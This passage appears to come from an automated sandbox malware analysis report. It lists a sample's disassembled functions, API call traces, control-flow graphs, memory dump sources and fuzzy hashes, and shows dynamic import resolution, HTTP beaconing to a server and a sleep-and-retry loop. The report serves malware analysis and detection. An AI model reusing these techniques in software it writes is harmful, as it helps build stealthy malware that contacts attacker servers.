                                • Associated: 00000000.00000002.1824294068.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_540000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                • String ID: "$"$------$------$------
                                • API String ID: 460715078-2180234286
                                • Opcode ID: 76d4342f6211b18752b50b7f1c5d415cab95fde370bf9f711a7bec7185ee0b97
                                • Instruction ID: 11bfdefe5bde5ff7d9ebae7526ccd04d132c2cd9998d10409d069d06a633ba0d
                                • Opcode Fuzzy Hash: 76d4342f6211b18752b50b7f1c5d415cab95fde370bf9f711a7bec7185ee0b97
                                • Instruction Fuzzy Hash: 83120F72910119AADB15EB90DC66FEEBB38BF94301F50429AB50663091EF702F4DCF66
                                Function 00557850 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,005411B7), ref: 00557880
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00557887
                                • GetUserNameA.ADVAPI32(00000104,00000104), ref: 0055789F
                                Memory Dump Source
                                • Source File: 00000000.00000002.1823359217.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                                • Associated: 00000000.00000002.1823325782.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.00000000009F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824067489.0000000000A36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824232792.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824294068.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_540000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateNameProcessUser
                                • String ID:
                                • API String ID: 1296208442-0
                                • Opcode ID: d4bb8fca113f90ce062dd9405b857bb141b1039c1f5e13a0eeb606f1434eb7c5
                                • Instruction ID: 2c4d2b98053619506c1266ad9c209b0f1d8a9943a6f3c67b784837e2a1d16652
                                • Opcode Fuzzy Hash: d4bb8fca113f90ce062dd9405b857bb141b1039c1f5e13a0eeb606f1434eb7c5
                                • Instruction Fuzzy Hash: 0BF04FB2944208ABDB10DF98DD49BAEBBB8FB08721F10465AFA05A2680C77815048BA1
                                Function 00541160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1823359217.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                                • Associated: 00000000.00000002.1823325782.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.00000000009F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824067489.0000000000A36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824232792.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824294068.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_540000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitInfoProcessSystem
                                • String ID:
                                • API String ID: 752954902-0
                                • Opcode ID: 31d03117b2dd062b03e29f2b2052961c476beeff6c710425227f5370a305d842
                                • Instruction ID: 866bd86557b26f156826fc20dd0e5d3d36d6d3039ae17df4f0d0e268f7677cd0
                                • Opcode Fuzzy Hash: 31d03117b2dd062b03e29f2b2052961c476beeff6c710425227f5370a305d842
                                • Instruction Fuzzy Hash: 02D05E7494030CEBDB00DFE0D8496DDBB78FB08315F101555D90562340EA345481CBAA
                                Function 00559C10 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684libraryloaderCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 633 559c10-559c1a 634 55a036-55a0ca LoadLibraryA * 8 633->634 635 559c20-55a031 GetProcAddress * 43 633->635 636 55a146-55a14d 634->636 637 55a0cc-55a141 GetProcAddress * 5 634->637 635->634 638 55a216-55a21d 636->638 639 55a153-55a211 GetProcAddress * 8 636->639 637->636 640 55a21f-55a293 GetProcAddress * 5 638->640 641 55a298-55a29f 638->641 639->638 640->641 642 55a2a5-55a332 GetProcAddress * 6 641->642 643 55a337-55a33e 641->643 642->643 644 55a344-55a41a GetProcAddress * 9 643->644 645 55a41f-55a426 643->645 644->645 646 55a4a2-55a4a9 645->646 647 55a428-55a49d GetProcAddress * 5 645->647 648 55a4dc-55a4e3 646->648 649 55a4ab-55a4d7 GetProcAddress * 2 646->649 647->646 650 55a515-55a51c 648->650 651 55a4e5-55a510 GetProcAddress * 2 648->651 649->648 652 55a612-55a619 650->652 653 55a522-55a60d GetProcAddress * 10 650->653 651->650 654 55a67d-55a684 652->654 655 55a61b-55a678 GetProcAddress * 4 652->655 653->652 656 55a686-55a699 GetProcAddress 654->656 657 55a69e-55a6a5 654->657 655->654 656->657 658 55a6a7-55a703 GetProcAddress * 4 657->658 659 55a708-55a709 657->659 658->659
                                APIs
                                • GetProcAddress.KERNEL32(74DD0000,01065990), ref: 00559C2D
                                • GetProcAddress.KERNEL32(74DD0000,01065710), ref: 00559C45
                                • GetProcAddress.KERNEL32(74DD0000,0107A950), ref: 00559C5E
                                • GetProcAddress.KERNEL32(74DD0000,0107A9C8), ref: 00559C76
                                • GetProcAddress.KERNEL32(74DD0000,0107A9E0), ref: 00559C8E
                                • GetProcAddress.KERNEL32(74DD0000,0107A968), ref: 00559CA7
                                • GetProcAddress.KERNEL32(74DD0000,0106C840), ref: 00559CBF
                                • GetProcAddress.KERNEL32(74DD0000,0107E200), ref: 00559CD7
                                • GetProcAddress.KERNEL32(74DD0000,0107E098), ref: 00559CF0
                                • GetProcAddress.KERNEL32(74DD0000,0107E038), ref: 00559D08
                                • GetProcAddress.KERNEL32(74DD0000,0107DFD8), ref: 00559D20
                                • GetProcAddress.KERNEL32(74DD0000,01065A30), ref: 00559D39
                                • GetProcAddress.KERNEL32(74DD0000,01065A10), ref: 00559D51
                                • GetProcAddress.KERNEL32(74DD0000,01065A70), ref: 00559D69
                                • GetProcAddress.KERNEL32(74DD0000,010656D0), ref: 00559D82
                                • GetProcAddress.KERNEL32(74DD0000,0107E020), ref: 00559D9A
                                • GetProcAddress.KERNEL32(74DD0000,0107DF48), ref: 00559DB2
                                • GetProcAddress.KERNEL32(74DD0000,0106C6D8), ref: 00559DCB
                                • GetProcAddress.KERNEL32(74DD0000,010656F0), ref: 00559DE3
                                • GetProcAddress.KERNEL32(74DD0000,0107DFF0), ref: 00559DFB
                                • GetProcAddress.KERNEL32(74DD0000,0107DFC0), ref: 00559E14
                                • GetProcAddress.KERNEL32(74DD0000,0107E1E8), ref: 00559E2C
                                • GetProcAddress.KERNEL32(74DD0000,0107E218), ref: 00559E44
                                • GetProcAddress.KERNEL32(74DD0000,01065730), ref: 00559E5D
                                • GetProcAddress.KERNEL32(74DD0000,0107E008), ref: 00559E75
                                • GetProcAddress.KERNEL32(74DD0000,0107E0E0), ref: 00559E8D
                                • GetProcAddress.KERNEL32(74DD0000,0107E068), ref: 00559EA6
                                • GetProcAddress.KERNEL32(74DD0000,0107E128), ref: 00559EBE
                                • GetProcAddress.KERNEL32(74DD0000,0107E0F8), ref: 00559ED6
                                • GetProcAddress.KERNEL32(74DD0000,0107E050), ref: 00559EEF
                                • GetProcAddress.KERNEL32(74DD0000,0107E170), ref: 00559F07
                                • GetProcAddress.KERNEL32(74DD0000,0107E1D0), ref: 00559F1F
                                • GetProcAddress.KERNEL32(74DD0000,0107E080), ref: 00559F38
                                • GetProcAddress.KERNEL32(74DD0000,0107B1E8), ref: 00559F50
                                • GetProcAddress.KERNEL32(74DD0000,0107E0B0), ref: 00559F68
                                • GetProcAddress.KERNEL32(74DD0000,0107E0C8), ref: 00559F81
                                • GetProcAddress.KERNEL32(74DD0000,01065750), ref: 00559F99
                                • GetProcAddress.KERNEL32(74DD0000,0107DF60), ref: 00559FB1
                                • GetProcAddress.KERNEL32(74DD0000,010657B0), ref: 00559FCA
                                • GetProcAddress.KERNEL32(74DD0000,0107E110), ref: 00559FE2
                                • GetProcAddress.KERNEL32(74DD0000,0107E158), ref: 00559FFA
                                • GetProcAddress.KERNEL32(74DD0000,010657D0), ref: 0055A013
                                • GetProcAddress.KERNEL32(74DD0000,01065AB0), ref: 0055A02B
                                • LoadLibraryA.KERNEL32(0107E140,?,00555CA3,00560AEB,?,?,?,?,?,?,?,?,?,?,00560AEA,00560AE3), ref: 0055A03D
                                • LoadLibraryA.KERNEL32(0107E188,?,00555CA3,00560AEB,?,?,?,?,?,?,?,?,?,?,00560AEA,00560AE3), ref: 0055A04E
                                • LoadLibraryA.KERNEL32(0107E1A0,?,00555CA3,00560AEB,?,?,?,?,?,?,?,?,?,?,00560AEA,00560AE3), ref: 0055A060
                                • LoadLibraryA.KERNEL32(0107E1B8,?,00555CA3,00560AEB,?,?,?,?,?,?,?,?,?,?,00560AEA,00560AE3), ref: 0055A072
                                • LoadLibraryA.KERNEL32(0107DF30,?,00555CA3,00560AEB,?,?,?,?,?,?,?,?,?,?,00560AEA,00560AE3), ref: 0055A083
                                • LoadLibraryA.KERNEL32(0107DF78,?,00555CA3,00560AEB,?,?,?,?,?,?,?,?,?,?,00560AEA,00560AE3), ref: 0055A095
                                • LoadLibraryA.KERNEL32(0107DF90,?,00555CA3,00560AEB,?,?,?,?,?,?,?,?,?,?,00560AEA,00560AE3), ref: 0055A0A7
                                • LoadLibraryA.KERNEL32(0107DFA8,?,00555CA3,00560AEB,?,?,?,?,?,?,?,?,?,?,00560AEA,00560AE3), ref: 0055A0B8
                                • GetProcAddress.KERNEL32(75290000,01065D30), ref: 0055A0DA
                                • GetProcAddress.KERNEL32(75290000,0107E350), ref: 0055A0F2
                                • GetProcAddress.KERNEL32(75290000,01079FD8), ref: 0055A10A
                                • GetProcAddress.KERNEL32(75290000,0107E3E0), ref: 0055A123
                                • GetProcAddress.KERNEL32(75290000,01065E50), ref: 0055A13B
                                • GetProcAddress.KERNEL32(73440000,0106C980), ref: 0055A160
                                • GetProcAddress.KERNEL32(73440000,01065B10), ref: 0055A179
                                • GetProcAddress.KERNEL32(73440000,0106C9A8), ref: 0055A191
                                • GetProcAddress.KERNEL32(73440000,0107E308), ref: 0055A1A9
                                • GetProcAddress.KERNEL32(73440000,0107E320), ref: 0055A1C2
                                • GetProcAddress.KERNEL32(73440000,01065B30), ref: 0055A1DA
                                • GetProcAddress.KERNEL32(73440000,01065DB0), ref: 0055A1F2
                                • GetProcAddress.KERNEL32(73440000,0107E2C0), ref: 0055A20B
                                • GetProcAddress.KERNEL32(752C0000,01065AF0), ref: 0055A22C
                                • GetProcAddress.KERNEL32(752C0000,01065BB0), ref: 0055A244
                                • GetProcAddress.KERNEL32(752C0000,0107E260), ref: 0055A25D
                                • GetProcAddress.KERNEL32(752C0000,0107E2D8), ref: 0055A275
                                • GetProcAddress.KERNEL32(752C0000,01065DF0), ref: 0055A28D
                                • GetProcAddress.KERNEL32(74EC0000,0106C868), ref: 0055A2B3
                                • GetProcAddress.KERNEL32(74EC0000,0106C598), ref: 0055A2CB
                                • GetProcAddress.KERNEL32(74EC0000,0107E248), ref: 0055A2E3
                                • GetProcAddress.KERNEL32(74EC0000,01065CB0), ref: 0055A2FC
                                • GetProcAddress.KERNEL32(74EC0000,01065B50), ref: 0055A314
                                • GetProcAddress.KERNEL32(74EC0000,0106CA48), ref: 0055A32C
                                • GetProcAddress.KERNEL32(75BD0000,0107E398), ref: 0055A352
                                • GetProcAddress.KERNEL32(75BD0000,01065C50), ref: 0055A36A
                                • GetProcAddress.KERNEL32(75BD0000,01079E88), ref: 0055A382
                                • GetProcAddress.KERNEL32(75BD0000,0107E2A8), ref: 0055A39B
                                • GetProcAddress.KERNEL32(75BD0000,0107E338), ref: 0055A3B3
                                • GetProcAddress.KERNEL32(75BD0000,01065CD0), ref: 0055A3CB
                                • GetProcAddress.KERNEL32(75BD0000,01065E10), ref: 0055A3E4
                                • GetProcAddress.KERNEL32(75BD0000,0107E290), ref: 0055A3FC
                                • GetProcAddress.KERNEL32(75BD0000,0107E278), ref: 0055A414
                                • GetProcAddress.KERNEL32(75A70000,01065B70), ref: 0055A436
                                • GetProcAddress.KERNEL32(75A70000,0107E368), ref: 0055A44E
                                • GetProcAddress.KERNEL32(75A70000,0107E2F0), ref: 0055A466
                                • GetProcAddress.KERNEL32(75A70000,0107E230), ref: 0055A47F
                                • GetProcAddress.KERNEL32(75A70000,0107E3B0), ref: 0055A497
                                • GetProcAddress.KERNEL32(75450000,01065CF0), ref: 0055A4B8
                                • GetProcAddress.KERNEL32(75450000,01065B90), ref: 0055A4D1
                                • GetProcAddress.KERNEL32(75DA0000,01065BD0), ref: 0055A4F2
                                • GetProcAddress.KERNEL32(75DA0000,0107E380), ref: 0055A50A
                                • GetProcAddress.KERNEL32(6F070000,01065D10), ref: 0055A530
                                • GetProcAddress.KERNEL32(6F070000,01065C70), ref: 0055A548
                                • GetProcAddress.KERNEL32(6F070000,01065D50), ref: 0055A560
                                • GetProcAddress.KERNEL32(6F070000,0107E3C8), ref: 0055A579
                                • GetProcAddress.KERNEL32(6F070000,01065D70), ref: 0055A591
                                • GetProcAddress.KERNEL32(6F070000,01065C30), ref: 0055A5A9
                                • GetProcAddress.KERNEL32(6F070000,01065D90), ref: 0055A5C2
                                • GetProcAddress.KERNEL32(6F070000,01065C90), ref: 0055A5DA
                                • GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 0055A5F1
                                • GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 0055A607
                                • GetProcAddress.KERNEL32(75AF0000,0107DCC0), ref: 0055A629
                                • GetProcAddress.KERNEL32(75AF0000,01079F88), ref: 0055A641
                                • GetProcAddress.KERNEL32(75AF0000,0107DF00), ref: 0055A659
                                • GetProcAddress.KERNEL32(75AF0000,0107DE10), ref: 0055A672
                                • GetProcAddress.KERNEL32(75D90000,01065AD0), ref: 0055A693
                                • GetProcAddress.KERNEL32(6F9D0000,0107DE88), ref: 0055A6B4
                                • GetProcAddress.KERNEL32(6F9D0000,01065DD0), ref: 0055A6CD
                                • GetProcAddress.KERNEL32(6F9D0000,0107DCA8), ref: 0055A6E5
                                • GetProcAddress.KERNEL32(6F9D0000,0107DD38), ref: 0055A6FD
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1823359217.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                                • Associated: 00000000.00000002.1823325782.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.00000000009F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824067489.0000000000A36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824232792.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824294068.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_540000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$LibraryLoad
                                • String ID: HttpQueryInfoA$InternetSetOptionA
                                • API String ID: 2238633743-1775429166
                                • Opcode ID: ab8a27108a65ba8c055d097de610c528c0ed7bb585d3e44f9a6f01189315d8c2
                                • Instruction ID: 8c2bd1f46042af4331dff5695dd1bf9af67209197da10ad2c688805e08b5f95d
                                • Opcode Fuzzy Hash: ab8a27108a65ba8c055d097de610c528c0ed7bb585d3e44f9a6f01189315d8c2
                                • Instruction Fuzzy Hash: 4F623DB5680200BFF745DFA8ED889563BF9F79C701734C51BA609C3224D63DA452EB2A
                                Function 00546280 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1033 546280-54630b call 55a7a0 call 5447b0 call 55a740 InternetOpenA StrCmpCA 1040 546314-546318 1033->1040 1041 54630d 1033->1041 1042 54631e-546342 InternetConnectA 1040->1042 1043 546509-546525 call 55a7a0 call 55a800 * 2 1040->1043 1041->1040 1044 5464ff-546503 InternetCloseHandle 1042->1044 1045 546348-54634c 1042->1045 1061 546528-54652d 1043->1061 1044->1043 1048 54634e-546358 1045->1048 1049 54635a 1045->1049 1051 546364-546392 HttpOpenRequestA 1048->1051 1049->1051 1053 5464f5-5464f9 InternetCloseHandle 1051->1053 1054 546398-54639c 1051->1054 1053->1044 1056 5463c5-546405 HttpSendRequestA HttpQueryInfoA 1054->1056 1057 54639e-5463bf InternetSetOptionA 1054->1057 1059 546407-546427 call 55a740 call 55a800 * 2 1056->1059 1060 54642c-54644b call 558940 1056->1060 1057->1056 1059->1061 1067 54644d-546454 1060->1067 1068 5464c9-5464e9 call 55a740 call 55a800 * 2 1060->1068 1071 546456-546480 InternetReadFile 1067->1071 1072 5464c7-5464ef InternetCloseHandle 1067->1072 1068->1061 1076 546482-546489 1071->1076 1077 54648b 1071->1077 1072->1053 1076->1077 1080 54648d-5464c5 call 55a9b0 call 55a8a0 call 55a800 1076->1080 1077->1072 1080->1071
                                APIs
                                  • Part of subcall function 0055A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0055A7E6
                                  • Part of subcall function 005447B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00544839
                                  • Part of subcall function 005447B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00544849
                                  • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                                • InternetOpenA.WININET(00560DFE,00000001,00000000,00000000,00000000), ref: 005462E1
                                • StrCmpCA.SHLWAPI(?,0107F608), ref: 00546303
                                • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00546335
                                • HttpOpenRequestA.WININET(00000000,GET,?,0107EFB8,00000000,00000000,00400100,00000000), ref: 00546385
                                • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 005463BF
                                • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 005463D1
                                • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 005463FD
                                • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0054646D
                                • InternetCloseHandle.WININET(00000000), ref: 005464EF
                                • InternetCloseHandle.WININET(00000000), ref: 005464F9
                                • InternetCloseHandle.WININET(00000000), ref: 00546503
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1823359217.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                                • Associated: 00000000.00000002.1823325782.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.00000000009F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824067489.0000000000A36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824232792.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824294068.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_540000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                • String ID: ERROR$ERROR$GET
                                • API String ID: 3749127164-2509457195
                                • Opcode ID: ab40f46a5d2469f8a56c078fce8667cc4f8a2533513d04537aace29373dedb36
                                • Instruction ID: 7f514b6d827b27c4ef4e35ce086dbf0955f25cf08fa387ffc761687a3b59f8c0
                                • Opcode Fuzzy Hash: ab40f46a5d2469f8a56c078fce8667cc4f8a2533513d04537aace29373dedb36
                                • Instruction Fuzzy Hash: 69717E71A40218ABEF24DFA0CC99BEE7B74FB44705F108199F5096B190DBB46A89CF52
                                Function 00555510 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1090 555510-555577 call 555ad0 call 55a820 * 3 call 55a740 * 4 1106 55557c-555583 1090->1106 1107 555585-5555b6 call 55a820 call 55a7a0 call 541590 call 5551f0 1106->1107 1108 5555d7-55564c call 55a740 * 2 call 541590 call 5552c0 call 55a8a0 call 55a800 call 55aad0 StrCmpCA 1106->1108 1124 5555bb-5555d2 call 55a8a0 call 55a800 1107->1124 1134 555693-5556a9 call 55aad0 StrCmpCA 1108->1134 1137 55564e-55568e call 55a7a0 call 541590 call 5551f0 call 55a8a0 call 55a800 1108->1137 1124->1134 1140 5557dc-555844 call 55a8a0 call 55a820 * 2 call 541670 call 55a800 * 4 call 556560 call 541550 1134->1140 1141 5556af-5556b6 1134->1141 1137->1134 1272 555ac3-555ac6 1140->1272 1142 5556bc-5556c3 1141->1142 1143 5557da-55585f call 55aad0 StrCmpCA 1141->1143 1146 5556c5-555719 call 55a820 call 55a7a0 call 541590 call 5551f0 call 55a8a0 call 55a800 1142->1146 1147 55571e-555793 call 55a740 * 2 call 541590 call 5552c0 call 55a8a0 call 55a800 call 55aad0 StrCmpCA 1142->1147 1161 555865-55586c 1143->1161 1162 555991-5559f9 call 55a8a0 call 55a820 * 2 call 541670 call 55a800 * 4 call 556560 call 541550 1143->1162 1146->1143 1147->1143 1250 555795-5557d5 call 55a7a0 call 541590 call 5551f0 call 55a8a0 call 55a800 1147->1250 1167 555872-555879 1161->1167 1168 55598f-555a14 call 55aad0 StrCmpCA 1161->1168 1162->1272 1174 5558d3-555948 call 55a740 * 2 call 541590 call 5552c0 call 55a8a0 call 55a800 call 55aad0 StrCmpCA 1167->1174 1175 55587b-5558ce call 55a820 call 55a7a0 call 541590 call 5551f0 call 55a8a0 call 55a800 1167->1175 1197 555a16-555a21 Sleep 1168->1197 1198 555a28-555a91 call 55a8a0 call 55a820 * 2 call 541670 call 55a800 * 4 call 556560 call 541550 1168->1198 1174->1168 1276 55594a-55598a call 55a7a0 call 541590 call 5551f0 call 55a8a0 call 55a800 1174->1276 1175->1168 1197->1106 1198->1272 1250->1143 1276->1168
                                APIs
                                  • Part of subcall function 0055A820: lstrlen.KERNEL32(00544F05,?,?,00544F05,00560DDE), ref: 0055A82B
                                  • Part of subcall function 0055A820: lstrcpy.KERNEL32(00560DDE,00000000), ref: 0055A885
                                  • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00555644
                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 005556A1
                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00555857
                                  • Part of subcall function 0055A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0055A7E6
                                  • Part of subcall function 005551F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00555228
                                  • Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905
                                  • Part of subcall function 005552C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00555318
                                  • Part of subcall function 005552C0: lstrlen.KERNEL32(00000000), ref: 0055532F
                                  • Part of subcall function 005552C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00555364
                                  • Part of subcall function 005552C0: lstrlen.KERNEL32(00000000), ref: 00555383
                                  • Part of subcall function 005552C0: lstrlen.KERNEL32(00000000), ref: 005553AE
                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0055578B
                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00555940
                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00555A0C
                                • Sleep.KERNEL32(0000EA60), ref: 00555A1B
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1823359217.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                                • Associated: 00000000.00000002.1823325782.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.00000000009F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824067489.0000000000A36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824232792.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
